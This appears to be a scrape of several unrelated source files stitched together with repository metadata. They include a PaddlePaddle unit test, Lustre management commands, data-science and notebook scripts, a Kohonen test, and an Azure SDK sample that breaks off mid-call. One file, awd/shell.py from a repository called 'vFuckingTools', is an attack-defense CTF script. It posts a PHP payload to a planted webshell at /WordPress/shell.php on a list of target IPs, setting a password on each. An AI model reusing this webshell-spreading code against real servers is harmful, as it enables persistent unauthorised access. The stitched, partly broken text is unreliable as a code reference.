# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import numpy as np
from paddle import _C_ops
from paddle.fluid.framework import _test_eager_guard, Variable, _in_legacy_dygraph
from paddle.fluid import core
from paddle.fluid.layers.utils import _hash_with_id
import paddle.compat as cpt
import unittest
def _append_backward_desc(main_program, outs):
    """Clone ``main_program`` and append backward ops for ``outs``.

    The clone keeps the caller's program untouched and guarantees all
    ``is_test`` flags are False in train mode.
    """
    program = main_program.clone()
    targets = [
        program.global_block().var(out.name)
        for out in outs
        if isinstance(out, Variable)
    ]
    if targets:
        paddle.fluid.backward.gradients(targets=targets, inputs=[])
    return program
# def _set_grad_type(params, train_program):
# # NOTE: if user set sparse gradient mode, the param's gradient
# # will be SelectedRows, not LoDTensor. But tracer will just
# # set param grad VarBase by forward VarBase(LoDTensor)
# # If we don't change grad_var type here, RunProgramOp need
# # transform SelectedRows to LoDTensor forcibly, it may not
# # be user wanted result.
# for param in params:
# grad_name = param.name + core.grad_var_suffix()
# grad_var = train_program.desc.block(0).find_var(
# cpt.to_bytes(grad_name))
# # NOTE: cannot find var desc maybe no problem, such as in batch_norm
# if grad_var is None:
# continue
# param._set_grad_type(grad_var.type())
def _create_out(var):
    """Create an empty VarBase / eager Tensor matching ``var``'s descriptor.

    Chooses the holder type based on whether the legacy dygraph mode is
    active.
    """
    assert isinstance(var, Variable)
    desc = var.desc
    if _in_legacy_dygraph():
        holder = core.VarBase(desc.dtype(), desc.shape(),
                              desc.name(), desc.type(), False)
    else:
        holder = core.eager.Tensor(desc.dtype(), desc.shape(),
                                   desc.name(), desc.type(), False)
    return holder
class TestRunProgram(unittest.TestCase):
    """End-to-end check of the eager-mode run_program op on a matmul graph."""

    def test_eager(self):
        paddle.set_device('cpu')
        paddle.enable_static()
        # step 1: construct program
        x = paddle.static.data(shape=[2, 4], name='x')
        x.stop_gradient = False
        y = paddle.static.data(shape=[4, 2], name='y')
        y.stop_gradient = False
        out = paddle.matmul(x, y)

        main_program = paddle.static.default_main_program()
        # Append backward ops so gradients can flow through run_program.
        program = _append_backward_desc(main_program, [out])

        paddle.disable_static('cpu')
        # step 2: call run_program in eager mode
        with _test_eager_guard():
            # Inputs must carry the same names as the static graph vars.
            x_t = paddle.ones([2, 4])
            x_t.name = "x"
            x_t.stop_gradient = False
            y_t = paddle.ones([4, 2])
            y_t.name = "y"
            y_t.stop_gradient = False

            fake_var = paddle.zeros([1])
            fake_var.name = 'Fake_var'

            out_t = _create_out(out)

            scope = core.Scope()
            # Flattened attribute list consumed positionally by the C op.
            attrs = ('global_block', program.desc.block(0), 'start_op_index', 0,
                     'end_op_index', main_program.desc.block(0).op_size(),
                     'is_test', False, 'program_id', _hash_with_id(program))

            _C_ops.run_program([x_t, y_t], [fake_var], [out_t], [scope],
                               [fake_var], None, *attrs)

            loss = paddle.mean(out_t)
            loss.backward()

            # ones(2,4) @ ones(4,2) == 4 everywhere; d(mean)/dx == 0.5.
            np.testing.assert_array_equal(np.ones([2, 2]) * 4, out_t.numpy())
            np.testing.assert_array_equal(
                np.ones([2, 4]) * 0.5, x_t.grad.numpy())
            np.testing.assert_array_equal(
                np.ones([4, 2]) * 0.5, y_t.grad.numpy())
if __name__ == '__main__':
    # Run the test suite when executed directly.
    unittest.main()
| [
"noreply@github.com"
] | jiangjiajun.noreply@github.com |
bd7f8f43434bce3c16ea97db4e907dd0e2835440 | 0cc8dd3549d12e24fb4ceb007001676a4dc27130 | /awd/shell.py | b103d3dce3c86c0c33f1f195501d91b5786e3a19 | [] | no_license | virink/vFuckingTools | 78c98a2093deac438e173e0ef2d72cc8453f33bd | 71cafcf60b347d09ff5c62fb9d7a27daea85b5e2 | refs/heads/master | 2021-01-22T18:29:00.926553 | 2019-05-05T05:51:38 | 2019-05-05T05:51:38 | 85,087,381 | 14 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,357 | py | #!/usr/bin/env python
import requests
import random
# Mapping of target IP -> password planted on that host.
ip_pass = {}
# Collected shell passwords (currently unused).
shell_pass = []
# Path of the already-deployed webshell on every target.
shell_address = '/WordPress/shell.php'
# Attack-defense targets.
ips = ['40.10.10.57',
       '40.10.10.26',
       '40.10.10.11',
       '40.10.10.62',
       '40.10.10.24',
       '40.10.10.59',
       '40.10.10.47',
       '40.10.10.42',
       '40.10.10.15',
       ]
def get_shell(file):
    """Return the contents of *file* as a string.

    Uses a context manager so the handle is closed deterministically; the
    original ``open(file).read()`` leaked the handle until GC.
    """
    with open(file) as handle:
        return handle.read()
def random_str(randomlength=6):
    """Return a random alphanumeric password of length *randomlength*.

    Rewritten with ``random.choice`` + ``str.join``; the original built the
    string with ``+=`` in a local named ``str``, shadowing the builtin.
    NOTE: ``random`` is not cryptographically secure; for real secrets use
    the ``secrets`` module.
    """
    chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
    return ''.join(random.choice(chars) for _ in range(randomlength))
def fuck(ip, password):
global filepath
# payload = % password
payload = get_shell('s4.php')
payload = payload.replace('passwordpassword', password).replace(
'<?php', '').replace('?>', '').replace('filepathfilepath', filepath)
try:
ip_pass[ip] = password
data = {'1': payload}
r = requests.post('http://' + ip + shell_address, data=data, timeout=3)
if r.status_code == '200':
print(ip + 'shell exist')
ip_pass[ip] = password
except requests.exceptions.ReadTimeout, e:
print('except : ' + e)
pass
if __name__ == '__main__':
    # Target file path substituted into the payload template; empty by default.
    filepath = ''
    for ip in ips:
        # A fresh random password per target.
        password = random_str()
        fuck(ip, password)
| [
"virink@outlook.com"
] | virink@outlook.com |
9da2c36775a99673d80810536059cc0b7380e907 | b0885fde23fff880927c3a6248c7b5a33df670f1 | /models/im_retrieval_transformer/edit_encoder.py | 0e4567075df31d82bd11666f71d482f72c5f7c10 | [] | no_license | mrsalehi/paraphrase-generation | ceb68200e9016c5f26036af565fafa2d736dc96b | 3e8bd36bd9416999b93ed8e8529bfdf83cf4dcdd | refs/heads/master | 2020-07-22T03:50:40.343595 | 2019-08-26T11:29:08 | 2019-08-26T11:29:08 | 207,065,580 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,640 | py | import tensorflow as tf
from models.common import graph_utils, vocab
from models.common.config import Config
from models.im_all_transformer import edit_encoder
from models.im_all_transformer.edit_encoder import TransformerMicroEditExtractor, WordEmbeddingAccumulator
from models.im_all_transformer.transformer import model_utils
from models.im_all_transformer.transformer.embedding_layer import EmbeddingSharedWeights
OPS_NAME = 'edit_encoder'
class EditEncoderAcc(tf.layers.Layer):
    """Edit encoder representing an edit as accumulated word embeddings.

    The edit vector concatenates an accumulation over the inserted words
    with an accumulation over the common words; each half contributes
    ``edit_dim // 2`` dimensions.
    """

    def __init__(self, config, **kwargs):
        super().__init__(config, **kwargs)
        self.config = config

        # Each of the two accumulated halves provides half of edit_dim.
        config.accumulated_dim = config.editor.edit_encoder.edit_dim // 2
        self.wa = WordEmbeddingAccumulator(config)

    # noinspection PyMethodOverriding
    def call(self, src_word_ids, tgt_word_ids,
             insert_word_ids, common_word_ids,
             src_len, tgt_len, iw_len, cw_len, **kwargs):
        with tf.variable_scope('edit_encoder'):
            orig_embedding_layer = EmbeddingSharedWeights.get_from_graph()

            wa_inserted = self.wa(orig_embedding_layer(insert_word_ids), iw_len)
            # BUG FIX: the common-word accumulation previously passed iw_len
            # (the insert-word lengths), leaving cw_len unused; cw_len is the
            # length tensor matching common_word_ids.
            wa_common = self.wa(orig_embedding_layer(common_word_ids), cw_len)

            edit_vector = tf.concat([wa_inserted, wa_common], axis=1)

            if self.config.editor.enable_dropout and self.config.editor.dropout > 0.:
                edit_vector = tf.nn.dropout(edit_vector, 1. - self.config.editor.dropout)

        # The two trailing tuples are placeholder attention/loss outputs kept
        # for interface compatibility with the transformer edit encoder.
        return edit_vector, (tf.constant([[0.0]]), tf.constant([[0.0]]), tf.constant([[0.0]])), \
               (tf.constant([[0.0]]), tf.constant([[0.0]]), tf.constant([[0.0]]))
| [
"ub.maka@gmail.com"
] | ub.maka@gmail.com |
6aaa0670890d94adae6318b188461250bd09151a | e601ff328271d102d6b38259129a588416279a3d | /Snek.py | 919628a5ef5b52837032d57a91758f83bef3c66f | [] | no_license | AlliterativeAnchovies/GameJamYamHam | 383c357adb2375cd7cf2f0cdd846e2824c4e69c1 | cba2c07098a7316d1b415c377151e8ba0902ecdf | refs/heads/master | 2021-05-07T01:27:46.474053 | 2017-11-13T16:55:29 | 2017-11-13T16:55:29 | 110,340,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py |
snekPosition = [0,0]
snekParts = []
def moveSnek(x, y):
snekPosition[0] += x
snekPosition[1] += y
def changeSnekSizeBy(count):
if count > 0:
pass
#snekParts.extend([pass for i in range(count)]) | [
"unconfigured@null.spigotmc.org"
] | unconfigured@null.spigotmc.org |
cb66fb20161657cdfa2e432eef049a08fc5795c3 | b169439ff77e4df4730b1efa09b3f306fbcd979f | /pyclownfish/clownfish_subsystem_service.py | 8f90b175b024d8dc03a87c36ffc03cc8bfe4b7fe | [
"MIT"
] | permissive | KnightKu/clownfish | 76d85030411d520ba3fcd301a796505cbfb863e7 | fb9209e99a22caa84e4ce8a7afa23dce46b0104c | refs/heads/master | 2022-07-28T21:41:40.351343 | 2020-02-16T14:47:08 | 2020-02-16T14:47:08 | 259,587,234 | 0 | 0 | null | 2020-04-28T09:11:14 | 2020-04-28T09:11:13 | null | UTF-8 | Python | false | false | 5,966 | py | # Copyright (c) 2020 DataDirect Networks, Inc.
# All Rights Reserved.
# Author: lixi@ddn.com
"""
Subsystem of service
"""
from pyclownfish import clownfish_command_common
from pylcommon import lustre
SUBSYSTEM_SERVICE_COMMNAD_MOVE = "move"
SUBSYSTEM_SERVICE_NAME = "service"
SUBSYSTEM_SERVICE = clownfish_command_common.Subsystem(SUBSYSTEM_SERVICE_NAME)
def service_move_usage(log):
    """Print the usage text of the ``service move`` command."""
    text = ("Usage: %s %s <service_name> <hostname>\n"
            "service_name: a Lustre service name, e.g. fsname-OST000a")
    log.cl_stdout(text % (SUBSYSTEM_SERVICE_NAME,
                          SUBSYSTEM_SERVICE_COMMNAD_MOVE))
def service_move(connection, args):
    """
    Move a Lustre service to one of its configured hosts.

    args[0] is the service name (e.g. fsname-OST000a) and args[1] the
    destination hostname.  Returns 0 on success, -1 on bad arguments,
    or the mount helper's return value otherwise.
    """
    # pylint: disable=too-many-branches
    log = connection.cc_command_log
    if ((clownfish_command_common.CLOWNFISH_OPTION_SHORT_HELP in args) or
            (clownfish_command_common.CLOWNFISH_OPTION_LONG_HELP in args)):
        service_move_usage(log)
        return 0

    instance = connection.cc_instance
    if len(args) != 2:
        service_move_usage(log)
        return -1

    service_name = args[0]
    hostname = args[1]
    service = instance.ci_name2service(service_name)
    if service is None:
        log.cl_error("invalid service name [%s]", service_name)
        return -1

    # The destination must host one of the service's configured instances.
    found = False
    for host in service.ls_hosts():
        if host.sh_hostname == hostname:
            found = True
            break
    if not found:
        log.cl_error("service [%s] doesn't have any instance on host [%s]",
                     service_name, hostname)
        return -1

    # The MGT is mounted directly; filesystem services are mounted through
    # the owning filesystem so its bookkeeping stays consistent.
    if service.ls_service_type == lustre.LUSTRE_SERVICE_TYPE_MGT:
        ret = service.ls_mount(log, hostname=hostname)
    else:
        ret = service.ls_lustre_fs.lf_mount_service(log, service, hostname=hostname)
    return ret
def service_move_argument(connection, complete_status):
    """Tab-completion helper for ``service move``.

    Offers service names for the third token and the candidate hostnames
    of the chosen service for the fourth; anything else completes to
    nothing.
    """
    instance = connection.cc_instance
    line = complete_status.ccs_line
    typed = line[0:complete_status.ccs_begidx].split()
    # typed[0] and typed[1] are expected to be "service" and "move"
    if len(typed) < 2:
        return []
    if len(typed) == 2:
        names = []
        for lustrefs in instance.ci_lustres.values():
            for service in lustrefs.lf_service_dict.itervalues():
                if service.ls_service_name not in names:
                    names.append(service.ls_service_name)
        for mgs in instance.ci_mgs_dict.values():
            if mgs.ls_service_name not in names:
                names.append(mgs.ls_service_name)
        return names
    if len(typed) == 3:
        service = instance.ci_name2service(typed[2])
        if service is None:
            return []
        return [host.sh_hostname for host in service.ls_hosts()]
    return []
COMMAND = clownfish_command_common.ClownfishCommand(SUBSYSTEM_SERVICE_COMMNAD_MOVE, service_move)
COMMAND.cc_add_argument(service_move_argument)
SUBSYSTEM_SERVICE.ss_command_dict[SUBSYSTEM_SERVICE_COMMNAD_MOVE] = COMMAND
SUBSYSTEM_SERVICE_COMMNAD_UMOUNT = "umount"
def service_umount_usage(log):
    """Print the usage text of the ``service umount`` command."""
    text = ("Usage: %s %s <service_name>...\n"
            "service_name: a Lustre service name, e.g. fsname-OST000a")
    log.cl_stdout(text % (SUBSYSTEM_SERVICE_NAME,
                          SUBSYSTEM_SERVICE_COMMNAD_UMOUNT))
def service_umount(connection, args):
    """
    Umount one or more Lustre services.

    Each argument is a service name; stops at the first failure.  Returns
    0 on success (including an empty argument list), -1 for an unknown
    service, or the umount helper's error code.
    """
    # pylint: disable=too-many-branches
    log = connection.cc_command_log
    if ((clownfish_command_common.CLOWNFISH_OPTION_SHORT_HELP in args) or
            (clownfish_command_common.CLOWNFISH_OPTION_LONG_HELP in args)):
        service_umount_usage(log)
        return 0

    instance = connection.cc_instance
    # BUG FIX: with an empty argument list the original fell through to
    # `return ret` with `ret` never assigned, raising UnboundLocalError.
    ret = 0
    for service_name in args:
        service = instance.ci_name2service(service_name)
        if service is None:
            log.cl_stderr("service name [%s] is not configured in Clownfish",
                          service_name)
            return -1

        # The MGT is umounted directly; filesystem services go through the
        # owning filesystem (mirrors service_move).
        if service.ls_service_type == lustre.LUSTRE_SERVICE_TYPE_MGT:
            ret = service.ls_umount(log)
        else:
            ret = service.ls_lustre_fs.lf_umount_service(log, service)
        if ret:
            return ret
    return ret
def service_umount_argument(connection, complete_status):
    """Tab-completion helper for ``service umount``.

    Every positional argument of ``service umount`` is a service name, so
    service-name candidates are offered for the third token and onwards.
    (The original was copied from the ``move`` completer and wrongly
    offered hostnames for the third token, although umount takes no
    hostname argument.)
    """
    instance = connection.cc_instance
    line = complete_status.ccs_line
    typed = line[0:complete_status.ccs_begidx].split()
    # typed[0] and typed[1] are expected to be "service" and "umount"
    if len(typed) < 2:
        return []
    candidates = []
    for lustrefs in instance.ci_lustres.values():
        for service in lustrefs.lf_service_dict.itervalues():
            if service.ls_service_name not in candidates:
                candidates.append(service.ls_service_name)
    for mgs in instance.ci_mgs_dict.values():
        if mgs.ls_service_name not in candidates:
            candidates.append(mgs.ls_service_name)
    return candidates
COMMAND = clownfish_command_common.ClownfishCommand(SUBSYSTEM_SERVICE_COMMNAD_UMOUNT, service_umount)
COMMAND.cc_add_argument(service_umount_argument)
SUBSYSTEM_SERVICE.ss_command_dict[SUBSYSTEM_SERVICE_COMMNAD_UMOUNT] = COMMAND
| [
"lixi@ddn.com"
] | lixi@ddn.com |
2773b3c2eb933aa1def2296c9be9cc09597c93b0 | 369e260e100db9ab5cc8b1711e99ef5e49aec173 | /data/dacon/comp1/dacon1_8_feature_importances.py | 63fbb471f1ea288e16cd5ce5ffd2e0ab4d5872ed | [] | no_license | HWALIMLEE/study | 7aa4c22cb9d7f7838634d984df96eed75f7aefea | 8336adc8999126258fe328d6b985a48e32667852 | refs/heads/master | 2023-03-26T09:11:19.606085 | 2021-03-29T23:03:04 | 2021-03-29T23:03:04 | 259,555,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,666 | py | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# Row 0 is the header, column 0 the index (both present in the CSV).
train=pd.read_csv('./data/dacon/comp1/train.csv',header=0,index_col=0)
test=pd.read_csv('./data/dacon/comp1/test.csv',header=0, index_col=0)
submission=pd.read_csv('./data/dacon/comp1/sample_submission.csv',header=0,index_col=0)

print("train.shape:",train.shape) # (10000, 75) # split into x/y train/test; evaluation also uses train
print("test.shape:",test.shape)   # (10000, 71) # becomes x_predict (has no y columns)
print("submission.shape:",submission.shape) # (10000, 4) # becomes y_predict
# test + submission = train columns; test has no targets.

# Outliers are unknown, but missing values can be detected directly.
print(train.isnull().sum())
# Linear interpolation per column fills most gaps reasonably well
# (not perfect, but a good default); remaining leading NaNs are
# back-filled.
train=train.interpolate()
train=train.fillna(method='bfill')
print(train.isnull().sum())
print("train:",train.head())

print(test.isnull().sum())
test=test.interpolate()
test=test.fillna(method='bfill')
print("test:",test.head())

# Cache the cleaned frames as numpy arrays for faster reloads.
np.save('./data/comp1_train.npy',arr=train)
np.save('./data/comp1_test.npy',arr=test)
# 1. Load the cached, cleaned data.
train=np.load('./data/comp1_train.npy')
test=np.load('./data/comp1_test.npy')

from sklearn.model_selection import train_test_split, RandomizedSearchCV
from keras.layers import Dense, LSTM, Conv2D, MaxPooling2D, Flatten, Input
from keras.models import Sequential, Model
from sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold, cross_val_score
from sklearn.neighbors import KNeighborsRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.pipeline import Pipeline
import warnings
from sklearn.tree import DecisionTreeRegressor

# First 71 columns are features, last 4 are the regression targets.
x=train[0:,0:71]
y=train[0:,71:]
print("x.shape:",x.shape) # (10000, 71)
print("y.shape:",y.shape) # (10000, 4)

x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2, random_state=60)
print("x_train.shape:",x_train.shape)
print("x_test.shape:",x_test.shape)
print("x_train",x_train)
print("x_test",x_test)
# Hyper-parameter search space for the decision tree.
# NOTE: sklearn requires min_samples_split >= 2, so the invalid value 1
# from the original grid is dropped.
parameters = {
    'min_samples_leaf': [1, 2, 4, 8, 16],
    'min_samples_split': [2, 4, 8, 16]
}

warnings.simplefilter(action='ignore', category=FutureWarning)

# 5-fold cross validation with shuffling.
kfold = KFold(n_splits=5, shuffle=True)

# Model: randomized hyper-parameter search over a decision tree regressor,
# using all CPU cores.
model = RandomizedSearchCV(DecisionTreeRegressor(), parameters, cv=kfold, n_jobs=-1)

# Train.
model.fit(x_train, y_train)

# BUG FIX: the fitted attribute is `best_estimator_` (singular); the
# original `best_estimators_` raised AttributeError.
print("최적의 매개변수=", model.best_estimator_.feature_importances_)
"""
import matplotlib.pyplot as plt
import numpy as np
def plot_feature_importances_(model):
n_features=train.data.shape[1]
plt.barh(np.arange(n_features),model.feature_importances_, align='center')
plt.yticks(np.arange(n_features),model.feature_names)
plt.xlabel("Feature importance")
plt.ylabel("Features")
plt.ylim(-1,n_features)
plt.subplots(figsize=(15,6))
plot_feature_importances_(model)
plt.show()
"""
"""
#평가, 예측
y_predict=model.predict(x_test)
result=model.predict(test)
from sklearn.metrics import mean_absolute_error
mae=mean_absolute_error(y_test,y_predict)
print("mae:",mae)
a = np.arange(10000,20000)
#np.arange--수열 만들때
submission = result
submission = pd.DataFrame(submission, a)
submission.to_csv("./data/dacon/comp1/sample_submission1_7.csv", header = ["hhb", "hbo2", "ca", "na"], index = True, index_label="id" )
"""
mae: 1.537
"""
"""
| [
"hwalim9612@gmail.com"
] | hwalim9612@gmail.com |
a5e9844ef7a8111c56eb3a1649bb77022f0d4a5c | 49c3abd2b3fbb3bc5d1df47b1fddd09694ee4835 | /scripts/translate_figs.py | 6d2ad35b0719ad7472ee6b8091d0baa8be07d3e2 | [] | no_license | phaustin/e213_2019 | 0b9970745e1bee29b58fa97bd425b66e01c20db8 | ff66cc94cba57f53955cbbb4a72885146cabd5e4 | refs/heads/master | 2021-05-18T18:48:38.507719 | 2019-04-18T18:48:12 | 2019-04-18T18:48:12 | 251,362,114 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,387 | py | """
Usage: python translate_figs.py notebook.py
Given a jupytext python:percent notebook,
change all occurances of an image tag like:
<img src="figures/2d_flux.png" alt="pic05" width="20%" >
to a python Image call like this:
# Image(figures/2d_flux.png){width="20%"}
and write it out as a new file called notebook_nbsphinx.py
along with a translated notebook notebook_nbsphinx.ipynb
"""
import argparse
import json
import pdb
import re
import sys
from pathlib import Path
import jupytext
import nbformat
from bs4 import BeautifulSoup
from jupytext.formats import JUPYTEXT_FORMATS
from jupytext.formats import rearrange_jupytext_metadata
from jupytext.jupytext import writes
from nbconvert.preprocessors import CellExecutionError
from nbconvert.preprocessors import ExecutePreprocessor
from nbformat.v4.nbbase import new_code_cell
from nbformat.v4.nbbase import new_markdown_cell
from nbformat.v4.nbbase import new_notebook
split_cell_re = re.compile(r"(.*)(#\s+.*\<img\s+src.*\>)(.*)", re.DOTALL)
image_re = re.compile(r"#\s+.*(\<img.*\>).*")
image_re = re.compile(r".*(\<img\s+src.*\>).*")
template = '# {{width="{width:}"}}\n'
py_template = 'Image("{src:}",width="{width:}")\n'
toc_meta = {
"toc": {
"base_numbering": 1,
"nav_menu": {},
"number_sections": True,
"sideBar": True,
"skip_h1_title": True,
"title_cell": "Table of Contents",
"title_sidebar": "Contents",
"toc_cell": True,
"toc_position": {},
"toc_section_display": True,
"toc_window_display": True,
}
}
fmt_dict = {item.format_name: item for item in JUPYTEXT_FORMATS}
def make_parser():
    """Build and return the command-line parser for this script.

    The module docstring is reused as the help description, preserving its
    line breaks via RawTextHelpFormatter.
    """
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawTextHelpFormatter,
        description=__doc__.lstrip(),
    )
    # BUG FIX: help text previously read "pytnon".
    parser.add_argument("infile", type=str, help="name of python notebook")
    return parser
def main(args=None):
    """Convert <img> tags in a jupytext notebook to IPython Image cells.

    Reads the given python:percent notebook, splits every markdown cell
    that embeds an ``<img src=...>`` tag into markdown/code/markdown
    cells (the code cell calls ``Image(...)``), executes the resulting
    notebook, and writes both ``*_nbsphinx.py`` and ``*_nbsphinx.ipynb``.

    BUG FIX: removed two leftover ``pdb.set_trace()`` breakpoints that
    halted every run inside the ``finally`` block, and dropped a large
    block of dead commented-out code.
    """
    parser = make_parser()
    args = parser.parse_args(args)
    infile = Path(args.infile).resolve()
    in_dir = infile.parent
    py_outfile = in_dir / f"{infile.stem}_nbsphinx.py"
    nb_outfile = in_dir.parent / f"{infile.stem}_nbsphinx.ipynb"
    print(f"writing:\n{py_outfile}\n{nb_outfile}")
    # Kept for its fail-fast side effect (raises if infile is unreadable);
    # the lines themselves are no longer used.
    with open(infile, "r") as input_file:
        in_py = input_file.readlines()

    orig_nb = jupytext.readf(infile)
    # Local pattern (shadows the module-level one): splits a markdown cell
    # into the text before the tag, the tag itself, and the text after.
    split_cell_re = re.compile(
        r"^(?P<front>.*?)(?P<img>\<img\s+src.*\>)(?P<back>.*?)", re.DOTALL
    )
    need_display_import = True
    new_nb_cells = list(orig_nb.cells)
    for index, item in enumerate(orig_nb.cells):
        print(f"at cell {index}")
        item["metadata"]["cell_count"] = index
        if item["cell_type"] == "markdown":
            text = item["source"]
            if text.find("pic") > -1:
                print(f"found img for: {text[:20]}")
                out = split_cell_re.match(text)
                if out:
                    print(f"length of split is {len(out.groups())}")
                    print(f"splitting cell at index {index}")
                    cell_dict = dict()
                    # Keep only the non-empty before/after fragments.
                    for name in ["front", "back"]:
                        src = out.group(name)
                        if len(src) > 0:
                            cell_dict[name] = new_markdown_cell(source=src)
                    # Turn the <img> tag into an Image(...) code cell.
                    src = out.group("img")
                    match = image_re.match(src)
                    if match:
                        text = match.group(1)
                        soup = BeautifulSoup(text, "html.parser")
                        out = soup()
                        py_image = py_template.format_map(out[0].attrs)
                        cell_dict["img"] = new_code_cell(source=py_image)
                    # NOTE(review): inserting at index + count places the new
                    # cells before the replaced "front" cell — looks like an
                    # off-by-one (index + 1 + count?); behavior kept as-is,
                    # confirm against a notebook with images.
                    count = 0
                    for key in ["front", "img", "back"]:
                        try:
                            if key == "front":
                                new_nb_cells[index] = cell_dict[key]
                            else:
                                new_nb_cells.insert(index + count, cell_dict[key])
                                count += 1
                        except KeyError:
                            pass
        else:
            item["metadata"]["cell_count"] = index
            if item["source"].find("IPython.display") > -1:
                need_display_import = False
                print(f"found python cell: {item['source']}")
    if need_display_import:
        # Ensure Image() is importable in the executed notebook.
        top_cell = new_code_cell(source="from IPython.display import Image")
        new_nb_cells.insert(1, top_cell)
    orig_nb.cells = new_nb_cells
    # https://nbconvert.readthedocs.io/en/latest/execute_api.html
    print(f"running notebook in folder {nb_outfile.parent}")
    ep = ExecutePreprocessor(timeout=600, kernel_name="python3", allow_errors=True)
    path = str(nb_outfile.parent)
    path_dict = dict({"metadata": {"path": path}})
    try:
        out = ep.preprocess(orig_nb, path_dict)
    except CellExecutionError:
        out = None
        msg = f"Error executing the notebook {nb_outfile.name}.\n\n"
        msg += f"See notebook {nb_outfile.name} for the traceback."
        print(msg)
        raise
    finally:
        # Always persist whatever state the notebook reached.
        if "toc" not in orig_nb["metadata"]:
            orig_nb["metadata"].update(toc_meta)
        rearrange_jupytext_metadata(orig_nb["metadata"])
        out = writes(orig_nb, "py", nbformat.NO_CONVERT)
        with open(nb_outfile, mode="wt") as f:
            nbformat.write(orig_nb, f)
        jupytext.writef(orig_nb, py_outfile, fmt="py")
        print(f"wrote {nb_outfile} and \n {py_outfile}")
print(f"wrote {nb_outfile} and \n {py_outfile}")
if __name__ == "__main__":
#
# will exit with non-zero return value if exceptions occur
#
# args = ['vancouver_hires.h5']
sys.exit(main())
| [
"paustin@eos.ubc.ca"
] | paustin@eos.ubc.ca |
2ebe41aa7b83bf751f563796d36307ca3e0d94da | 8e6546515c8094f2df7fca4be343b57a1716257a | /tests/algorithms/associative/test_kohonen.py | d8a23d2f1bcfb9f72d8e7f49994c478d12883f70 | [
"MIT"
] | permissive | FGDBTKD/neupy | b51e5870ef75df8aa3dcfb6753648a235f39e50b | 1f5e1ae9364e8c7816df79678a4648c689d2a5d1 | refs/heads/master | 2020-03-31T13:32:57.099935 | 2018-10-29T15:52:19 | 2018-10-29T15:52:19 | 152,260,277 | 0 | 0 | MIT | 2018-10-29T15:52:20 | 2018-10-09T13:56:16 | Python | UTF-8 | Python | false | false | 1,731 | py | import numpy as np
from neupy import algorithms
from base import BaseTestCase
# Six unit-length 2-D sample vectors used as training input by the tests.
input_data = np.array([
    [0.1961, 0.9806],
    [-0.1961, 0.9806],
    [0.9806, 0.1961],
    [0.9806, -0.1961],
    [-0.5812, -0.8137],
    [-0.8137, -0.5812],
])
class KohonenTestCase(BaseTestCase):
    """Unit tests for the Kohonen self-organising network."""

    def test_kohonen_success(self):
        # Fixed initial weights so the update after one sample is
        # deterministic and can be checked numerically.
        kh = algorithms.Kohonen(
            n_inputs=2,
            n_outputs=3,
            weight=np.array([
                [0.7071, 0.7071, -1.0000],
                [-0.7071, 0.7071, 0.0000],
            ]),
            step=0.5,
            verbose=False,
        )

        # test one iteration update
        data = np.reshape(input_data[0, :], (1, input_data.shape[1]))
        kh.train(data, epochs=1)
        # Only the winning neuron's column (index 1) moves toward the input.
        np.testing.assert_array_almost_equal(
            kh.weight,
            np.array([
                [0.7071, 0.4516, -1.0000],
                [-0.7071, 0.84385, 0.0000],
            ]),
            decimal=4
        )

    def test_train_different_inputs(self):
        # A flat 1-D vector should be accepted for training.
        self.assertInvalidVectorTrain(
            algorithms.Kohonen(
                n_inputs=1,
                n_outputs=2,
                step=0.5,
                verbose=False
            ),
            np.array([1, 2, 3])
        )

    def test_predict_different_inputs(self):
        knet = algorithms.Kohonen(
            n_inputs=1,
            n_outputs=2,
            step=0.5,
            verbose=False,
        )

        data = np.array([[1, 1, 1]]).T
        target = np.array([
            [1, 0],
            [1, 0],
            [1, 0],
        ])

        knet.train(data, epochs=100)
        # Prediction should accept a flat vector as well as a column matrix.
        self.assertInvalidVectorPred(knet, data.ravel(), target,
                                     decimal=2)
| [
"mail@itdxer.com"
] | mail@itdxer.com |
39f57c10873dc5efeea1c40d3f35d8a875752a36 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/network/azure-mgmt-network/generated_samples/virtual_network_tap_update_tags.py | 8ee1c7cf9b1a0d4963d50d2406f32510d2a37a27 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,614 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.network import NetworkManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-network
# USAGE
python virtual_network_tap_update_tags.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
    """Update the tags of a virtual network tap and print the service response."""
    network_client = NetworkManagementClient(
        credential=DefaultAzureCredential(),
        subscription_id="subid",
    )
    result = network_client.virtual_network_taps.update_tags(
        resource_group_name="rg1",
        tap_name="test-vtap",
